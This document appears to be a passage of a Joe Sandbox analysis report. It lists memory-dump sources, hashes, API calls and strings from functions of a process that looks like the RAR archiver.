                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3947729631-0
                                                                                                                                                                                                                              • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction ID: ffbd0ba86c1cc6377009d26b621d815302b419d8c39b0782e202c8d9ab6ee73c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5641A021B19A6386FB6C9B5CD45017862A1FF98B40F084639DB0DD76B1DE3EE8458740
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction ID: 060052920554f354ab94a1dd135d4d83206a5620f49d879f84fdc571d32a541f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62E04F50F29302C0ED6EA62A185B07D02603FAEB80E54643ACE1EC63A2DF1DB4559720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3664257935-0
                                                                                                                                                                                                                              • Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction ID: 84059751c8a71e96d4032afa7b8d7f9c73cf8cc29f3c9305fcbdd86208bf4877
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6FD09E65E1A90686F70EDB49E8657301261FF5C799F450734CB1D85571CFAD20D48308
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindClose.KERNELBASE(00000000,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCD4549
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                                                                                              • Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction ID: 9c340a6bbd13502c7511ece7d6ecaf2d12ed5a4813b41556c9fcb9648c7174fc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4C04C69E4548185D548972D98591641120BB49B35F941731D33D455F09F5854AB4700
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                                                                              • Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction ID: 6ee6671c07fabd77236a37f0ddf666491f854ddd207baf15cc2c8ec9db9c962c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81F0AF22A8864649FB28CB68E4483796660EB18BB8F586334D77D850E9CF6CD892C750
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCF49F4: LoadStringW.USER32 ref: 00007FF6BBCF4A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCF49F4: LoadStringW.USER32 ref: 00007FF6BBCF4A94
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCFB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6BBCCCBED,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCFB730
                                                                                                                                                                                                                              • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6BBCD6CB0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: LoadString$Sleepfflushswprintf
• String ID: %12ls: %ls$%12ls: %ls$%21ls %-16ls %u$%21ls %9ls %3d%% %-27ls %u$%s: $%s: %s$----------- --------- -------- ----- ---------- ----- -------- ----$----------- --------- ---------- ----- ----$%.10ls %u$%21ls %18s %lu$%21ls %9ls %3d%% %28ls %u$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$%s%s$EOF$RAR 1.4$RAR 4$RAR 5$V
• API String ID: 668332963-4283793440
• Opcode ID: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
• Instruction ID: f529568c97b89dfd19e5f01d174ac3dc0b293305e167f3acf0547f481bf1aba3
• Opcode Fuzzy Hash: cff16b410779efd6418cbb4bfaefd77790891fdcb5da60b35bb77876aa469163
• Instruction Fuzzy Hash: 9A22C022A4DAC255EB24DB2CE8541FA67B1FF99344F440136D78D87ABADF2CE649C700
APIs
• CreateFileW.KERNEL32 ref: 00007FF6BBCCD4A6
• CloseHandle.KERNEL32 ref: 00007FF6BBCCD4B9
  • Part of subcall function 00007FF6BBCCEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF73
  • Part of subcall function 00007FF6BBCCEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF84
  • Part of subcall function 00007FF6BBCCEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6BBCCEFA7
  • Part of subcall function 00007FF6BBCCEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6BBCCEFCA
  • Part of subcall function 00007FF6BBCCEF50: GetLastError.KERNEL32 ref: 00007FF6BBCCEFD4
  • Part of subcall function 00007FF6BBCCEF50: CloseHandle.KERNEL32 ref: 00007FF6BBCCEFE7
• CreateDirectoryW.KERNEL32 ref: 00007FF6BBCCD4C6
• CreateFileW.KERNEL32 ref: 00007FF6BBCCD64A
• DeviceIoControl.KERNEL32 ref: 00007FF6BBCCD68B
• CloseHandle.KERNEL32 ref: 00007FF6BBCCD69A
• GetLastError.KERNEL32 ref: 00007FF6BBCCD6AD
• RemoveDirectoryW.KERNEL32 ref: 00007FF6BBCCD6FA
• DeleteFileW.KERNEL32 ref: 00007FF6BBCCD705
  • Part of subcall function 00007FF6BBCD2310: FlushFileBuffers.KERNEL32 ref: 00007FF6BBCD233E
  • Part of subcall function 00007FF6BBCD2310: SetFileTime.KERNEL32 ref: 00007FF6BBCD23DB
  • Part of subcall function 00007FF6BBCD1930: CloseHandle.KERNELBASE ref: 00007FF6BBCD1958
  • Part of subcall function 00007FF6BBCD39E0: SetFileAttributesW.KERNEL32(?,00007FF6BBCD34EE,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD3A0F
  • Part of subcall function 00007FF6BBCD39E0: SetFileAttributesW.KERNEL32(?,00007FF6BBCD34EE,?,?,?,?,00000800,00000000,00000000,00007FF6BBCE38CB,?,?,?,00007FF6BBCE41EC), ref: 00007FF6BBCD3A3C
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: File$CloseHandle$Create$AttributesDirectoryErrorLastProcessToken$AdjustBuffersControlCurrentDeleteDeviceFlushLookupOpenPrivilegePrivilegesRemoveTimeValue
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 2750113785-3508440684
• Opcode ID: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
• Instruction ID: ecd452e95971b7281485447228d21bfc9314b26f61b452cc7dceadc7b4c28870
• Opcode Fuzzy Hash: 1a7d86559847920f8bb109ab3d7291439b8a259b3f48a060f5ee007c4e7161c6
• Instruction Fuzzy Hash: C1D1DF26A0868696EB24DF28E8542FD73B0FB58798F504231DB5D876E9DF3CE50AC740
APIs
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAEE9
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAF01
• GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAF19
• GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAF75
• GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFAFB0
• SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFB23B
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFB244
• FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF6BBCB2E4C), ref: 00007FF6BBCFB287
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
• String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
• API String ID: 3483800833-4165214152
• Opcode ID: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
• Instruction ID: 588399884adba2e00015e50f9ce868be3f9049c3eea03270400bb4e99df79805
• Opcode Fuzzy Hash: 8f878c9cc2ffebf2ccf382536ffbb2373ba61f84303543efc970922cd888523d
• Instruction Fuzzy Hash: 54C18F32A09B8286EB14DF29D8542AD67B0FF88B94F444135EB4E87BA5DF3CD549C700
APIs
Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: ExitProcessTokenWindows$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID: SeShutdownPrivilege
• API String ID: 3729174658-3733053543
• Opcode ID: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction ID: 563f0a1313ffdf245ab9162737d426db1c13c9ecb28f4a761ec2960c5a460f81
• Opcode Fuzzy Hash: fa1b4f4939311264a597a3e156d3f94e3144e33e257b2b707d9ae949dbaf0abe
• Instruction Fuzzy Hash: 07218132A18A4286FB98DB68E46937E6361FB9C744F905135DB4E86974CF3DD449C700
APIs
• FindFirstFileW.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE298
• FindClose.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE2AB
• CreateFileW.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE2F7
  • Part of subcall function 00007FF6BBCCEF50: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF73
  • Part of subcall function 00007FF6BBCCEF50: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,00007FF6BBCCEE47), ref: 00007FF6BBCCEF84
  • Part of subcall function 00007FF6BBCCEF50: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF6BBCCEFA7
  • Part of subcall function 00007FF6BBCCEF50: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6BBCCEFCA
  • Part of subcall function 00007FF6BBCCEF50: GetLastError.KERNEL32 ref: 00007FF6BBCCEFD4
                                                                                                                                                                                                                                • Part of subcall function 00007FF6BBCCEF50: CloseHandle.KERNEL32 ref: 00007FF6BBCCEFE7
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF6BBCCE357
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000001,?,00007FF6BBCB2014), ref: 00007FF6BBCCE362
                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
• Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmp
• Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_105_2_7ff6bbcb0000_rar.jbxd
Similarity
• API ID: Close$FileFindHandleProcessToken$AdjustControlCreateCurrentDeviceErrorFirstLastLookupOpenPrivilegePrivilegesValue
• String ID: SeBackupPrivilege
• API String ID: 3094086963-2429070247
• Opcode ID: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
• Instruction ID: 0b238bbe06d28b98be81a7bd60b50861306a80db286d649ceafec92856baf082
• Opcode Fuzzy Hash: 6b1f5dc95f58b75a03985b82b44585fe4ffe7301fcc115945b13fd181dcb0710
• Instruction Fuzzy Hash: 9F61B032A0868286E728DF69E4582ED23B0FB5D794F804235DB6E97AE5CF3CE155C740
APIs
Strings
Similarity
• API ID: Sleepswprintf
• String ID: $%ls%0*u.rev
• API String ID: 407366315-3491873314
• Opcode ID: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
• Instruction ID: 27c9852247dc89f923514e31e8764e9ffac2658e9f66d5f5d61947ef4fffcd5f
• Opcode Fuzzy Hash: 782f304219662b4eecf027b144e7046621da4246e6178cffb5e29678f0c5f42f
• Instruction Fuzzy Hash: 0902C032A1868286EB24DB29E4896BE63B5FB8C784F410135DF5D8B7A9DF3CE445C700
APIs
• new.LIBCMT ref: 00007FF6BBCB4BD8
  • Part of subcall function 00007FF6BBCFB6D0: Sleep.KERNEL32(?,?,?,?,00007FF6BBCCCBED,?,00000000,?,00007FF6BBCF7A8C), ref: 00007FF6BBCFB730
  • Part of subcall function 00007FF6BBCD1E80: CreateFileW.KERNELBASE ref: 00007FF6BBCD1F4A
  • Part of subcall function 00007FF6BBCD1E80: GetLastError.KERNEL32 ref: 00007FF6BBCD1F59
  • Part of subcall function 00007FF6BBCD1E80: CreateFileW.KERNELBASE ref: 00007FF6BBCD1F99
  • Part of subcall function 00007FF6BBCD1E80: GetLastError.KERNEL32 ref: 00007FF6BBCD1FA2
  • Part of subcall function 00007FF6BBCD1E80: SetFileTime.KERNEL32 ref: 00007FF6BBCD1FF1
Strings
Similarity
• API ID: File$CreateErrorLast$SleepTime
• String ID: %12s %s$%12s %s$ $%s
• API String ID: 2965465231-221484280
• Opcode ID: 243e240d92035203585a04358195e9a1f419bc689fbc130788e8de5a1c1be098
• Instruction ID: 446b3b12e8b82844f66b3237aafa7339b1037fbbc35600e217d62557634abff6
• Opcode Fuzzy Hash: 243e240d92035203585a04358195e9a1f419bc689fbc130788e8de5a1c1be098
• Instruction Fuzzy Hash: BCF1BD22B0DA8A86EA70DB1AE0582BE63B1FB8DB84F840435DB4D877A5DF3CD555C300
APIs
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
• Instruction ID: e218a78f696793cf3f22fb9cce14a81a6388ea0d262e31333ce93723555dbc80
• Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
• Instruction Fuzzy Hash: F3316436618F818ADB64CF29E8502AE73A4FB88754F540635EB9D83B69DF3CD145CB00
APIs
Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000069.00000002.2058751378.00007FF6BBCB1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF6BBCB0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058709732.00007FF6BBCB0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058823399.00007FF6BBD20000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058874469.00007FF6BBD38000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058914324.00007FF6BBD39000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD3A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD44000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD4E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2058952098.00007FF6BBD56000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059150760.00007FF6BBD58000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000069.00000002.2059191683.00007FF6BBD5E000.00000002.00000001.01000000.00000021.sdmpDownload File
